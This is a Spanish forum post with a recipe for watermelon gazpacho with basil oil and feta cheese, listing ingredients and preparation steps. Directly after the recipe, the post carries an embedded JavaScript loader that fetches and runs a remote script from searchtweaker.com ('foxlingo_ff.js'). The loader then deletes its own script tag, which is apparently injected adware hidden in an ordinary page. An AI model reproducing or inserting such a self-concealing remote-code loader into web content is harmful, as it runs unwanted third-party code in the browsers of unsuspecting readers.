Ajenos
¿Quieres reaccionar a este mensaje? Regístrate en el foro con unos pocos clics o inicia sesión para continuar.

Gazpacho de sandía con aceite de albahaca y queso feta

Ir abajo

chef Gazpacho de sandía con aceite de albahaca y queso feta

Mensaje por Lilith Miér 05 Jun 2013, 09:58


[Tienes que estar registrado y conectado para ver esa imagen]



Ingredientes:

1 pimiento rojo
3 tomates maduros
350 g de sandía sin pepitas
4 cucharadas soperas de aceite de oliva
2 cucharaditas de azúcar
2 cucharadas soperas de vinagre
300 ml de agua
una pizca de sal
200 ml de aceite de oliva
1 ramillete de albahaca fresca
100 g de queso feta



Elaboración:


Pelamos
los tomates y los troceamos. Limpiamos el pimiento y lo partimos, le
quitamos la piel a la sandía, la troceamos y la ponemos en un recipiente
junto con el agua, el azúcar, el vinagre y la sal. La trituraramos y a
continuación vamos añadiendo las 4 cucharadas soperas de aceite de oliva
a chorro fifi no. Colamos y reservamos en frío.
Para el aceite de
albahaca, trituramos la albahaca con 200 ml de aceite de oliva, picamos
el queso feta y lo reservamos. Montamos el gazpacho en un vaso de
cristal, ponemos encima el queso picado y añadimos un cordón de aceite
de albahaca.


(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Lilith
Lilith
Ajen@


Volver arriba Ir abajo

Volver arriba

- Temas similares

 
Permisos de este foro:
No puedes responder a temas en este foro.